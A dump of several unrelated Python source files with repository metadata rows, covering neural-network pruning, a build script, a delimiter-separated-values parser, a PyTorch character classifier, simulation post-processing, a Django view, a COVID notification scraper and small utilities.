# considered any longer because all its parameters have been zeroed out.
if recursive_pruning:
(neuron_a, neuron_b) = pair
neurons_manipulated[layer_idx].remove(neuron_a)
else:
# Drop that pair from the neurons_manipulated list and enable re-considering in future epoch
(neuron_a, neuron_b) = pair
neurons_manipulated[layer_idx].remove(neuron_a)
neurons_manipulated[layer_idx].remove(neuron_b)
count += 1
# Here we evaluate the impact to the output layer
if cumul_impact_ints_curr_layer is None:
cumul_impact_ints_curr_layer = simprop.calculate_impact_of_pruning_next_layer(model, big_map, pruning_pairs_curr_layer_confirmed, layer_idx)
else:
cumul_impact_ints_curr_layer = ia.interval_list_add(cumul_impact_ints_curr_layer,
simprop.calculate_impact_of_pruning_next_layer(model, big_map,
pruning_pairs_curr_layer_confirmed,
layer_idx,
kaggle_credit=kaggle_credit))
if cumulative_impact_intervals is None:
cumulative_impact_intervals = simprop.calculate_bounds_of_output(model, cumul_impact_ints_curr_layer, layer_idx+1)
else:
cumulative_impact_intervals= ia.interval_list_add(cumulative_impact_intervals,
simprop.calculate_bounds_of_output(model,
cumul_impact_ints_curr_layer,
layer_idx+1))
print(" >> DEBUG: len(cumulative_impact_curr_layer_pruning_to_next_layer):", len(cumul_impact_ints_curr_layer))
print(" >> DEBUG: len(cumulative_impact_to_output_layer):", len(cumulative_impact_intervals))
# Now let's do pruning (simulated, by zeroing out weights but keeping neurons in the network)
for (node_a, node_b) in pruning_pairs_curr_layer_confirmed:
# Change all weight connecting from node_b to the next layers as the sum of node_a and node_b's ones
# & Reset all weight connecting from node_a to ZEROs
# RECALL: next_weights_neuron_as_rows = w[layer_idx+1][0] ([0] for weight and [1] for bias)
for i in range(0, num_next_neurons):
w[layer_idx + 1][0][node_a][i] = w[layer_idx + 1][0][node_b][i] + w[layer_idx + 1][0][node_a][i]
w[layer_idx + 1][0][node_b][i] = 0
total_pruned_count += 1
# Save the modified parameters to the model
model.layers[layer_idx + 1].set_weights(w[layer_idx + 1])
pruned_pairs[layer_idx].extend(pruning_pairs_curr_layer_confirmed)
# TEMP IMPLEMENTATION STARTS HERE
if not kaggle_credit:
big_map = simprop.get_definition_map(model, definition_dict=big_map, input_interval=(0, 1))
else:
big_map = simprop.get_definition_map(model, definition_dict=big_map, input_interval=(-5, 5))
print("Pruning layer #", layer_idx, "completed, updating definition hash map...")
# TEMP IMPLEMENTATION ENDS HERE
layer_idx += 1
print(" >> DEBUG: size of cumulative impact total", len(cumulative_impact_intervals))
print("Pruning accomplished -", total_pruned_count, "units have been pruned")
return model, neurons_manipulated, pruned_pairs, cumulative_impact_intervals, pruning_pairs_dict_overall_scores
def pruning_stochastic(model, big_map, prune_percentage,
cumulative_impact_intervals,
neurons_manipulated=None,
target_scores=None,
hyperparamters=(0.5, 0.5),
recursive_pruning=True,
bias_aware=False,
kaggle_credit=False):
# Load the parameters and configuration of the input model
(w, g) = utils.load_param_and_config(model)
num_layers = len(model.layers)
total_pruned_count = 0
layer_idx = 0
pruned_pairs = []
pruning_pairs_dict_overall_scores =[]
if neurons_manipulated is None:
neurons_manipulated = []
if target_scores is None:
target_scores = []
e_ij_matrix = []
while layer_idx < num_layers - 1:
cumul_impact_ints_curr_layer = None
pruned_pairs.append([])
if len(neurons_manipulated) < layer_idx + 1:
neurons_manipulated.append([])
if len(target_scores) < layer_idx + 1:
target_scores.append(-1)
e_ij_matrix.append(None)
pruning_pairs_dict_overall_scores.append(None)
# Exclude non FC layers
if "dense" in model.layers[layer_idx].name:
# print("Pruning Operation Looking at Layer", layer_idx)
num_prev_neurons = len(w[layer_idx][0])
num_curr_neurons = len(w[layer_idx][0][0])
num_next_neurons = len(w[layer_idx + 1][0][0])
# curr_weights_neuron_as_rows records the weights parameters originating from the prev layer
curr_weights_neuron_as_rows = np.zeros((num_curr_neurons, num_prev_neurons))
for idx_neuron in range(0, num_curr_neurons):
for idx_prev_neuron in range(0, num_prev_neurons):
curr_weights_neuron_as_rows[idx_neuron][idx_prev_neuron] = w[layer_idx][0][idx_prev_neuron][
idx_neuron]
# next_weights_neuron_as_rows records the weights parameters connecting to the next layer
next_weights_neuron_as_rows = w[layer_idx + 1][0]
print(" >> Building saliency matrix for layer " + str(layer_idx) + "...")
if bias_aware:
# w[layer_idx][1] records the bias per each neuron in the current layer
e_ij_matrix[layer_idx] = saliency.build_saliency_matrix_with_bias(curr_weights_neuron_as_rows,
next_weights_neuron_as_rows,
w[layer_idx][1])
else:
e_ij_matrix[layer_idx] = saliency.build_saliency_matrix(curr_weights_neuron_as_rows,
next_weights_neuron_as_rows)
import pandas as pd
df = pd.DataFrame(data=e_ij_matrix[layer_idx])
# find the candidates neuron to be pruned according to the saliency
if prune_percentage is not None:
num_candidates_to_gen = math.ceil(prune_percentage * num_curr_neurons)
else:
num_candidates_to_gen = 1
# find the candidates neuron to be pruned according to the saliency
top_candidates = utils.get_all_pairs_by_saliency(df, neurons_manipulated[layer_idx])
# Just return if there is no candidates to prune
if len(top_candidates) == 0:
return model, neurons_manipulated, [], cumulative_impact_intervals, pruning_pairs_dict_overall_scores
# Now let's process the top_candidate first:
# top_candidate is a list of Series, with key as multi-index, and value as saliency
# and we are going to transform that list into a dictionary to facilitate further ajustment
pruning_pairs_curr_layer_confirmed = []
count = 0
pruning_pairs_dict_overall_scores[layer_idx] ={}
# A workaround if pruned candidates is less than num_candidate_to_prune after a walking
# then we need to re-walk again until the number of units to be pruned reaches target
while (count < num_candidates_to_gen):
for idx_candidate, pruning_candidate in enumerate(top_candidates):
# Extract the indexes of pruning nodes as a tuple (corr. score is no longer useful since this step)
(node_a, node_b) = pruning_candidate.index.values[0]
# print(" >> Looking into", (node_a, node_b))
'''
# CHANGE on Commit db9c736, to make it consistent with paper
# To standarise the pruning operation for the same pair: we always prune the node with smaller index off
if node_a > node_b:
temp = node_a
node_a = node_b
node_b = temp
'''
if count < num_candidates_to_gen:
# Below is the hill climbing algorithm to update the top_candidate by dividing the original saliency by
# the l1-norm of the budget preservation list (the higher the better)
pruning_impact_as_interval_next_layer = simprop.calculate_impact_of_pruning_next_layer(model, big_map,
[(node_a, node_b)], layer_idx,
kaggle_credit=kaggle_credit)
# Check is cumulative_impact_interval is none or not, not none means there is already some cumulative impact
# caused by previous pruning actions
if cumul_impact_ints_curr_layer is not None:
pruning_impact_as_interval_next_layer = ia.interval_list_add(pruning_impact_as_interval_next_layer,
cumul_impact_ints_curr_layer)
pruning_impact_as_interval_output_layer = simprop.calculate_bounds_of_output(model,
pruning_impact_as_interval_next_layer,
layer_idx + 1)
big_L = utils.l1_norm_of_intervals(pruning_impact_as_interval_output_layer)
# Use sigmoid logistic to normalize
big_L = 1 / (1 + math.exp(-1 * big_L))
big_ENT = utils.interval_based_entropy(pruning_impact_as_interval_output_layer, similarity_criteria=0.9)
# Use sigmoid logistic to normalize
big_ENT = 1 / (1 + math.exp(-1 * big_ENT))
# Now we are going re-sort the saliency according to the utilization situation of each pair pruning
(alpha, beta) = hyperparamters
# print((node_a, node_b), "Ent:", big_ENT)
curr_score = big_L * alpha + big_ENT * beta
# Accept the first sample by-default, or a sample with better (smaller) score
if target_scores[layer_idx] == -1 or curr_score <= target_scores[layer_idx]:
target_scores[layer_idx] = curr_score
pruning_pairs_curr_layer_confirmed.append((node_a, node_b))
# If recursive mode is enabled, the affected neuron (node_a) in the current epoch still
# get a chance to be considered in the next epoch. The pruned one (node_b) won't be
# considered any longer because all its parameters have been zeroed out.
if recursive_pruning:
if node_a in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_a)
count += 1
pruning_pairs_dict_overall_scores[layer_idx][(node_a, node_b)] = target_scores[layer_idx]
print(" [DEBUG]", utility.bcolors.OKGREEN, "Accepting", utility.bcolors.ENDC, (node_a, node_b), curr_score)
# Then we use simulated annealing algorithm to determine if we accept the next pair in the pruning list
else:
# Progress is a variable that grows from 0 to 1
progress = len(neurons_manipulated[layer_idx])/num_curr_neurons
# Define a temperature decending linearly with progress goes on (add 0.0001 to avoid divide-by-zero issue)
temperature = 1.0001 - progress
# Calculate the delta of score (should be a positive value because objective is minimum)
delta_score = curr_score - target_scores[layer_idx]
prob_sim_annealing = math.exp(-1 * delta_score / temperature)
prob_random = random.random()
# Higher probability of simulated annealing, easilier to accept a bad choice
if prob_random < prob_sim_annealing:
target_scores[layer_idx] = curr_score
pruning_pairs_curr_layer_confirmed.append((node_a, node_b))
# If recursive mode is enabled, the affected neuron (node_a) in the current epoch still
# get a chance to be considered in the next epoch. The pruned one (node_b) won't be
# considered any longer because all its parameters have been zeroed out.
if recursive_pruning:
if node_a in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_a)
count += 1
pruning_pairs_dict_overall_scores[layer_idx][(node_a, node_b)] = curr_score
print(" [DEBUG]", utility.bcolors.OKGREEN, "Accepting (stochastic)", utility.bcolors.ENDC, (node_a, node_b), "despite the score",
round(curr_score, 6), "because the probability", round(prob_random, 6), "<=", round(prob_sim_annealing, 6))
else:
print(" [DEBUG]", utility.bcolors.FAIL, "Reject", utility.bcolors.ENDC, (node_a, node_b), "because the score",
round(curr_score, 6), ">", round(target_scores[layer_idx], 6), "and random prob. doesn't satisfy", round(prob_sim_annealing, 6))
# Drop that pair from the neurons_manipulated list and enable re-considering in future epoch
if node_b in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_b)
if node_a in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_a)
else:
# Drop that pair from the neurons_manipulated list and enable re-considering in future epoch
if node_b in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_b)
if node_a in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_a)
if (count < num_candidates_to_gen):
print(" >> Insufficient number of pruning candidates, walk again ...")
# Here we evaluate the impact to the output layer
if cumul_impact_ints_curr_layer is None:
cumul_impact_ints_curr_layer = simprop.calculate_impact_of_pruning_next_layer(model, big_map, pruning_pairs_curr_layer_confirmed, layer_idx)
else:
cumul_impact_ints_curr_layer = ia.interval_list_add(cumul_impact_ints_curr_layer,
simprop.calculate_impact_of_pruning_next_layer(model, big_map,
pruning_pairs_curr_layer_confirmed,
layer_idx,
kaggle_credit=kaggle_credit))
if cumulative_impact_intervals is None:
cumulative_impact_intervals = simprop.calculate_bounds_of_output(model, cumul_impact_ints_curr_layer, layer_idx+1)
else:
cumulative_impact_intervals= ia.interval_list_add(cumulative_impact_intervals,
simprop.calculate_bounds_of_output(model,
cumul_impact_ints_curr_layer,
layer_idx+1))
# print(" >> DEBUG: len(cumulative_impact_curr_layer_pruning_to_next_layer):", len(cumul_impact_ints_curr_layer))
# print(" >> DEBUG: len(cumulative_impact_to_output_layer):", len(cumulative_impact_intervals))
# Now let's do pruning (simulated, by zeroing out weights but keeping neurons in the network)
for (node_a, node_b) in pruning_pairs_curr_layer_confirmed:
# Change all weight connecting from node_b to the next layers as the sum of node_a and node_b's ones
# & Reset all weight connecting from node_a to ZEROs
# RECALL: next_weights_neuron_as_rows = w[layer_idx+1][0] ([0] for weight and [1] for bias)
for i in range(0, num_next_neurons):
w[layer_idx + 1][0][node_a][i] = w[layer_idx + 1][0][node_b][i] + w[layer_idx + 1][0][node_a][i]
w[layer_idx + 1][0][node_b][i] = 0
total_pruned_count += 1
# Save the modified parameters to the model
model.layers[layer_idx + 1].set_weights(w[layer_idx + 1])
pruned_pairs[layer_idx].extend(pruning_pairs_curr_layer_confirmed)
# TEMP IMPLEMENTATION STARTS HERE
if not kaggle_credit:
big_map = simprop.get_definition_map(model, definition_dict=big_map, input_interval=(0, 1))
else:
big_map = simprop.get_definition_map(model, definition_dict=big_map, input_interval=(-5, 5))
print("Pruning layer #", layer_idx, "completed, updating definition hash map...")
# TEMP IMPLEMENTATION ENDS HERE
layer_idx += 1
print(" >> DEBUG: size of cumulative impact total", len(cumulative_impact_intervals))
print("Pruning accomplished -", total_pruned_count, "units have been pruned")
return model, neurons_manipulated, target_scores, pruned_pairs, cumulative_impact_intervals, pruning_pairs_dict_overall_scores
| [
"huasong.meng@gmail.com"
] | huasong.meng@gmail.com |
95cd4d519c8b65d09a90e0a1a1ab1db1c5e65090 | b677894966f2ae2d0585a31f163a362e41a3eae0 | /ns3/pybindgen-0.17.0.post57+nga6376f2/tests/boost/wscript | 575c486512db2596263726622d81756947c7266d | [
"LGPL-2.1-only",
"Apache-2.0"
] | permissive | cyliustack/clusim | 667a9eef2e1ea8dad1511fd405f3191d150a04a8 | cbedcf671ba19fded26e4776c0e068f81f068dfd | refs/heads/master | 2022-10-06T20:14:43.052930 | 2022-10-01T19:42:19 | 2022-10-01T19:42:19 | 99,692,344 | 7 | 3 | Apache-2.0 | 2018-07-04T10:09:24 | 2017-08-08T12:51:33 | Python | UTF-8 | Python | false | false | 1,018 | ## -*- python -*-
#from waflib import Task
import sys
import os.path
import os
import subprocess
# uncomment to enable profiling information
# epydoc uses the profile data to generate call graphs
#os.environ["PYBINDGEN_ENABLE_PROFILING"] = ""
if 0:
DEPRECATION_ERRORS = '-Werror::DeprecationWarning' # deprecations become errors
else:
DEPRECATION_ERRORS = '-Wdefault::DeprecationWarning' # normal python behaviour
def build(bld):
env = bld.env
env['TOP_SRCDIR'] = bld.srcnode.abspath()
bindgen = bld(
features='command',
source='barmodulegen.py',
target='barmodule.cc',
command='${PYTHON} %s ${SRC[0]} ${TOP_SRCDIR} > ${TGT[0]}' % (DEPRECATION_ERRORS,))
if env['CXX'] and env['ENABLE_BOOST_SHARED_PTR'] == True:
obj = bld(features='cxx cxxshlib pyext')
obj.source = [
'bar.cc',
'barmodule.cc'
]
obj.target = 'bar'
obj.install_path = None
obj.env.append_value("INCLUDES", '.')
| [
"you@example.com"
] | you@example.com | |
f46767f0cb57c7bfcc381cb179d5a5d2687ff68b | f1bcf67d0d2f50abece18f388d8fb133b6fc5ef1 | /hello.py | bdf7c0a0359af0a7261cc010df198d5af3242728 | [] | no_license | Tochit/repo | e369e4bc16cc76cff549df5010e934f40292c9f2 | a29cc4e83e55dc27f7e4274bd21c597bda75f7c8 | refs/heads/master | 2020-03-27T08:27:40.601692 | 2018-08-27T06:42:47 | 2018-08-27T06:42:47 | 146,256,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103 | py | # This is my start back into the real world!
print("Hello everyone, excited to be here with you all!")
| [
"42474056+Tochit@users.noreply.github.com"
] | 42474056+Tochit@users.noreply.github.com |
1a23264abf173dd6e2f451aa249496654ac13ced | 3c5c707ed1577c7af5125824d8d349c2a48f65a4 | /dsv.py | 4102eacd1913297bfa1e23b4c5ecd743bf20eeb3 | [
"BSD-2-Clause"
] | permissive | mrozo/hut | e56b3495f27f6e4fe97f59df13dc01dbd19e9dc0 | 0293d54cf6ccab4f92c968db3a2e46bed0f90172 | refs/heads/master | 2023-05-26T07:50:40.456099 | 2021-06-12T00:24:24 | 2021-06-12T00:24:24 | 332,919,574 | 1 | 0 | BSD-2-Clause | 2021-03-26T23:30:32 | 2021-01-26T00:03:31 | Python | UTF-8 | Python | false | false | 1,579 | py | from typing import List, Iterable
def dsv_escape(string, delimiter=';'):
return str(string).replace('\\', '\\\\').replace('\n', '\\n').replace(delimiter, f'\{delimiter}')
def dsv_record_dump(elements, delimiter=';'):
return delimiter.join(map(dsv_escape, elements))
def dsv_value_load(line, delimiter=';'):
escape_sequences = {
'a': '\a',
'b': '\b',
'f': '\f',
'n': '\n',
'r': '\r',
't': '\t',
'v': '\v'
}
escape=False
offset=0
value=''
while offset < len(line):
c = line[offset]
offset+=1
if escape:
value += escape_sequences.get(c, c)
escape = False
elif c=='\\':
escape=True
elif c==delimiter:
break
else:
value+=c
return value, offset
def dsv_record_load(line, delimiter=';'):
line=line.strip()
offset = 0
parsed = []
while offset < len(line):
value, parsed_chars = dsv_value_load(line[offset:], delimiter)
offset += parsed_chars
parsed.append(value)
return parsed
def dsv_reader(data_source: Iterable[str], delimiter=';') -> Iterable[List[str]]:
return map(lambda l: dsv_record_load(l, delimiter), data_source)
def interleave_list_with_element(the_list: Iterable, element):
for list_element in the_list:
yield list_element
yield element
def dsv_generator(data_source: Iterable, method='as_dsv'):
return interleave_list_with_element(map(lambda r: getattr(r, method)(), data_source), "\n")
| [
"private@mrozo.pl"
] | private@mrozo.pl |
57603327b9887f32d8203a36ccf6526fb96c1757 | fee972575370e9c3892e4563246d7e872202216a | /src/torch_model.py | e413038ca8077c4c2722f679370f8574b4cd3cdf | [] | no_license | jsw95/accounts-checker-ai | 94a4b0e80e33ae8c5ea5a36c3f4e54397e93742d | ebea2be216554fba7c60052b44bdc85e5afc2246 | refs/heads/master | 2021-06-30T04:56:08.203955 | 2020-10-28T10:25:20 | 2020-10-28T10:25:20 | 182,429,480 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,491 | py | import os
import re
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from skimage import io
import pathlib
from src.data_processing import generate_char_dict
from src.data_processing import resize_img, binary_threshold, transform_image_for_training
base_data_path = "/home/jack/Workspace/data/accounts/images/"
print(f"GPU available: {torch.cuda.is_available()}")
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(13456, 120)
self.fc2 = nn.Linear(120, 76)
self.fc3 = nn.Linear(76, 58) # num chars
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 13456)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def train():
print("Training")
epoch_loss = 0
for epoch in range(10):
print(epoch_loss)
epoch_loss = 0
# for i, data in enumerate(trainloader, 0):
for inputs, label in zip(imgs, labs):
label = torch.Tensor([int(label)]).to(torch.int64)
inputs, label = inputs.to(device), label.to(device)
optimizer.zero_grad()
output = net(inputs)
loss = criterion(output, label)
loss.backward()
optimizer.step()
epoch_loss += float(loss)
torch.save(net.state_dict(), f'{pathlib.Path(__file__).parent.parent}/models/first_.sav')
if __name__ == '__main__':
net = Net()
net.to(device)
char_dict = generate_char_dict()
print(char_dict)
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)
imgs, labs = [], []
for file in os.listdir("/home/jack/Workspace/data/accounts/English/Img/allImgs")[50:200]:
if file.endswith('.png'):
lab = re.match(r'img([0-9]+)', file).group(1)
img = io.imread(f"/home/jack/Workspace/data/accounts/English/Img/allImgs/{file}", as_grey=True)
img = transform_image_for_training(img)
img = torch.from_numpy(img).unsqueeze(0).unsqueeze(0).to(torch.float32)
imgs.append(img)
labs.append(lab)
train()
| [
"wells.jack@hotmail.co.uk"
] | wells.jack@hotmail.co.uk |
e914a333d58ef80b35b7481bd60714074e533942 | 62fc36b3244037355ac18749c200492a39b793a0 | /Week5/Predict.py | f48d3d739420d8f3baab1a641bfa70320367edde | [] | no_license | charleseagle/Machine-Learning-Coursera-Python | 0afc994e09fc2b609327e9899c859daa457724bb | b85f18104d4ad14b7b90c96272adf6c85a2a53c2 | refs/heads/master | 2021-01-14T13:44:13.533910 | 2015-10-25T23:08:48 | 2015-10-25T23:08:48 | 44,615,834 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | from __future__ import division
import numpy as np
import Sigmoid
def Predict(theta1, theta2, X):
m = np.shape(X)[0]
#num_labels = np.shape(theta2)[0]
p = np.zeros((m,1))
h1 = Sigmoid.Sigmoid(np.append(np.ones((m,1)), X, 1).dot(theta1.T))
h2 = Sigmoid.Sigmoid(np.append(np.ones((m,1)), h1, 1).dot(theta2.T))
for i in range(np.shape(h2)[0]):
p[i] = np.where(h2 == h2[i,:].max())[1]
return p + 1 | [
"sunqicharles@gmail.com"
] | sunqicharles@gmail.com |
f60819f9f80dbc0c89af1fe4036d18f232f00e97 | 4cc0be2edb699b77cf7f092454275af2cca61c6f | /corona.py | 7741106cc2352a12d2d56b2a3e50e8792fdec6c1 | [] | no_license | miglaniparth/CoronaVirusNotification | a9add03e4334e582534813531276a9a54cf13e28 | 4fd5025b341d7bb93bb46b80210eb41c358e80c7 | refs/heads/master | 2023-04-21T22:39:18.243151 | 2021-04-14T06:58:54 | 2021-04-14T06:58:54 | 275,451,040 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,284 | py | from plyer import notification
import requests
from bs4 import BeautifulSoup
import time
def notifyMe(title, message):
notification.notify(
title = title,
message = message,
app_icon = "icon.ico",
timeout = 6
)
def getData(url):
r = requests.get(url)
return r.text
if _name_ == "_main_":
while True:
# notifyMe("Harry", "Lets stop the spread of this virus together")
myHtmlData = getData('https://www.mohfw.gov.in/')
soup = BeautifulSoup(myHtmlData, 'html.parser')
# print(soup.prettify())
myDataStr = ""
for tr in soup.find_all('tbody')[1].find_all('tr'):
myDataStr += tr.get_text()
myDataStr = myDataStr[1:]
itemList = myDataStr.split("\n\n")
states = ['Chandigarh', 'Telengana', 'Uttar Pradesh']
for item in itemList[0:22]:
dataList = item.split('\n')
if dataList[1] in states:
nTitle = 'Cases of Covid-19'
nText = f"State {dataList[1]}\nIndian : {dataList[2]} & Foreign : {dataList[3]}\nCured : {dataList[4]}\nDeaths : {dataList[5]}"
notifyMe(nTitle, nText)
time.sleep(2)
time.sleep(3600)
| [
"noreply@github.com"
] | miglaniparth.noreply@github.com |
c911f4f6bb37290fb1349c27b7005f20efd9f809 | bafbbf964c45c4cbed2e3c4bcfd94fa28c567928 | /f3dasm/post_processing.py | 4dbb8a8ebce41cb3e23370485e102ed03b54d177 | [
"BSD-3-Clause"
] | permissive | niketagrawal/F3DASM | 2b5a4774a59a8aa917519aa2cb366498e34b3e65 | 768acf1f8407e28cdb93dfe53a2fd0dd92947a6d | refs/heads/master | 2023-08-24T20:40:23.447354 | 2020-11-09T00:28:42 | 2020-11-09T00:28:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,465 | py | '''
Created on 2020-05-05 16:28:59
Last modified on 2020-09-30 11:42:01
@author: L. F. Pereira (lfpereira@fe.up.pt)
'''
# imports
# standard library
import os
import pickle
import gzip
import shutil
# third-party
import pandas as pd
# local library
from .utils.file_handling import get_unique_file_by_ext
from .utils.file_handling import collect_folder_names
from .utils.utils import get_int_number_from_str
from .utils.utils import read_pkl_file
# TODO: possibility of entering abaqus for post-processing
# function definition
def post_process_sims(pp_fnc, example_name, sim_numbers=None,
sims_dir_name='analyses', data_filename='DoE.pkl',
data=None, raw_data='raw_data.pkl', create_new_file='',
pp_fnc_kwargs=None):
'''
Parameters
----------
create_new_file : str
If not empty, then a new file is created containing the information
in `data_filename` plus the treated outputs.
data_filename : str
If `data` is given and `data_filename` is empty, then an updated file
will not be stored.
data : dict
If given, `data_filename` will be ignored during data reading.
raw_data : pd.Series or str or None.
Data is gatherer according to `raw_data` type. The possibilities are:
None: simulation folders
str: raw data file
pandas.Series: uses itself.
Notes
-----
1. If the output variables already exist in 'points', their values are
updated only if the post-processing data for the given point is available
in `sims_dir_name`. Otherwise, older values are kept.
'''
# initialization
pp_fnc_kwargs = {} if pp_fnc_kwargs is None else pp_fnc_kwargs
# get current pandas
if data is None:
with open(os.path.join(example_name, data), 'rb') as file:
data = pickle.load(file)
points = data['points']
# get available simulations
if type(raw_data) is str or raw_data is None:
raw_data = collect_raw_data(example_name, sims_dir_name=sims_dir_name,
sim_numbers=sim_numbers, delete=False,
raw_data_filename=raw_data)
# add outputs to pd.Dataframe (also post-processes 1st simulation)
column_names = list(points.columns.values)
sim_numbers = list(raw_data.keys()) if sim_numbers is None else list(sim_numbers)
sim_number = sim_numbers.pop(0)
data_sim = raw_data.loc[sim_number]
results_sim = pp_fnc(data_sim, **pp_fnc_kwargs)
output_variables = list(results_sim.keys())
for variable in output_variables[::-1]:
if variable not in column_names:
points.insert(loc=len(column_names), value=None, column=variable)
for key, value in results_sim.items():
points.loc[sim_number, key] = value
# get results for each simulation
for sim_number, data_sim in raw_data.loc[sim_numbers].iteritems():
results_sim = pp_fnc(data_sim, **pp_fnc_kwargs)
for key, value in results_sim.items():
points.loc[sim_number, key] = value
# create new pickle file
data_filename_output = create_new_file if create_new_file else data_filename
if data_filename_output:
with open(os.path.join(example_name, data_filename_output), 'wb') as file:
pickle.dump(data, file)
return data
def get_sim_data(dir_name, folder_name):
# TODO: add possibility of using gzip
# get filename and read data
dir_name = os.path.join(dir_name, folder_name)
filename = get_unique_file_by_ext(dir_name, ext='.pkl')
with open(os.path.join(dir_name, filename), 'rb') as file:
data = pickle.load(file, encoding='latin1')
return data
def concatenate_raw_data(example_name, data_filename='DoE.pkl',
raw_data_filename='raw_data.pkl', sims_dir_name='analyses',
delete=False, compress=True, sim_numbers=None):
'''
Creates an unique file that contains all the information of the problem.
Parameters
----------
compress : bool
If True, zips file using gzip. It may take longer. Depending on the data,
the compression ratio may be huge.
Notes
-----
1. If file already exists, then data in 'analyses' is added to the
already existing information (overriding pre-existing information).
'''
# initialization
open_file = gzip.open if compress else open
# verify if file already exists
if os.path.exists(os.path.join(example_name, raw_data_filename)):
raw_data = read_pkl_file(os.path.join(example_name, raw_data_filename))
else:
raw_data = pd.Series(dtype=object)
# get available simulations
new_raw_data = collect_raw_data_from_folders(example_name,
sims_dir_name=sims_dir_name,
sim_numbers=sim_numbers, delete=delete)
raw_data = new_raw_data.combine_first(raw_data).sort_index()
# save file
with open_file(os.path.join(example_name, raw_data_filename), 'wb') as file:
pickle.dump(raw_data, file)
return raw_data
def collect_raw_data(example_name, sims_dir_name='analyses', sim_numbers=None,
delete=False, raw_data_filename='raw_data.pkl'):
if raw_data_filename:
raw_data = read_pkl_file(os.path.join(example_name, raw_data_filename))
if sim_numbers is not None:
raw_data = raw_data.loc[sim_numbers]
else:
raw_data = collect_raw_data_from_folders(
example_name, sims_dir_name=sims_dir_name,
sim_numbers=sim_numbers, delete=False)
return raw_data
def collect_raw_data_from_folders(example_name, sims_dir_name='analyses',
sim_numbers=None, delete=False):
# get available simulations
dir_name = os.path.join(example_name, sims_dir_name)
folder_names = collect_folder_names(dir_name, sim_numbers=sim_numbers)
# store the information of each available DoE point
raw_data = {}
for folder_name in folder_names:
# simulation number
i = get_int_number_from_str(folder_name)
# get data
raw_data[i] = get_sim_data(dir_name, folder_name)
# delete folder
if delete:
shutil.rmtree(os.path.join(dir_name, folder_name))
return pd.Series(raw_data)
| [
"lfpereira@fe.up.pt"
] | lfpereira@fe.up.pt |
2aea9148c27a7fbf9f644d8c40edb2525fad701b | dd483c380c93edb21dae4cb0cb082ba0bfeb3e6a | /app/src/apps/stats/topological_stat/views.py | 7c0caf2793ef1aa6e631cff093ebcec9992ed96e | [] | no_license | BarbaraDiazE/D_Peptide_Builder | 7aa4647c9b0ce20d8a258834d0dffaf21e368224 | d47e29e0b9e55bd6e520bc9caf7d362e796d458d | refs/heads/master | 2020-04-25T02:29:03.092694 | 2019-02-25T20:43:19 | 2019-02-25T20:43:19 | 172,440,859 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | from rest_framework.views import APIView
from django.http import HttpResponse
from django.shortcuts import render, render_to_response
import pandas as pd
import os
import glob
from .compute_topological import statTOPOLOGICAL
class TOPOLOGICALView(APIView):
def get(self, request):
csv_name = request.session['csv_name']
stat = statTOPOLOGICAL(csv_name)
stat_topological_html = stat.resolve()
context = {'loaded_data': stat_topological_html}
return render(request, 'stats_topological.html', context) | [
"debi_1223@hotmail.com"
] | debi_1223@hotmail.com |
cb5c24b4ef410ce18ba99f9a7dfde0edd77054ea | ccb5bc03e4d4a63efe9451016dc2107826077f55 | /main.py | da1eb3f329f99adcf99492c4dea844620f6f5558 | [] | no_license | happyperson10/hill-climb-racing | f7533a1580be282faac9069f26c61319e7c9a88c | 48f85cbbe47ec97b456f6299410c06bac44e9978 | refs/heads/master | 2022-11-10T17:10:44.287859 | 2020-07-02T15:08:49 | 2020-07-02T15:08:49 | 276,645,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | import pygame
# Init here
pygame.init()
# Variables here
width = 800
height = 600
# Window of the game here
window = pygame.display.set_mode((width,height))
pygame.display.set_caption("pygame")
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
| [
"noreply@github.com"
] | happyperson10.noreply@github.com |
667fdd75326c1bad1cc0510e96ba34551f7e1f78 | b314d2efe8d8e0e12a8cce68bfed6bdc1357a7aa | /jobs/JobPIMCs.py | bd12b2ddeb6c840aaa8cbbefefe7d89cf3169f4c | [] | no_license | BohdanKul/Scripts | 1caf3090d619c433527b70db89f5db4d4e013bf6 | 20a97f3b0def49ba51151581228c105c9449bbba | refs/heads/master | 2021-01-19T06:49:55.062103 | 2017-11-01T13:10:27 | 2017-11-01T13:10:27 | 22,358,855 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,388 | py | import sys,os,shutil
from optparse import OptionParser
def GetPIMCs(fileName):
'''Creates a list of PIMC ids from a job output file generated on a cluster'''
inLines = []
try:
inFile = open(fileName,'r')
inLines = inFile.readlines();
except:
return 0
PIMCs = []
Mstate = False
Mstate = True
for line in inLines:
#if line.find('Legs') != -1:
# Mstate = True
# continue
if Mstate:
if line.find('Measurement taken') != -1:
pimcid = line[:9]
PIMCs.append(pimcid)
break
inFile.close
return PIMCs
def GetUnique(PIMCs):
'''Returns unique entries in PIMCs list'''
res = [PIMCs[0]]
for PIMC in PIMCs[1:]:
newflag = bool(1)
for pimcid in res:
if pimcid == PIMC:
newflag = bool(0)
break
if newflag == True:
res.append(PIMC)
return res
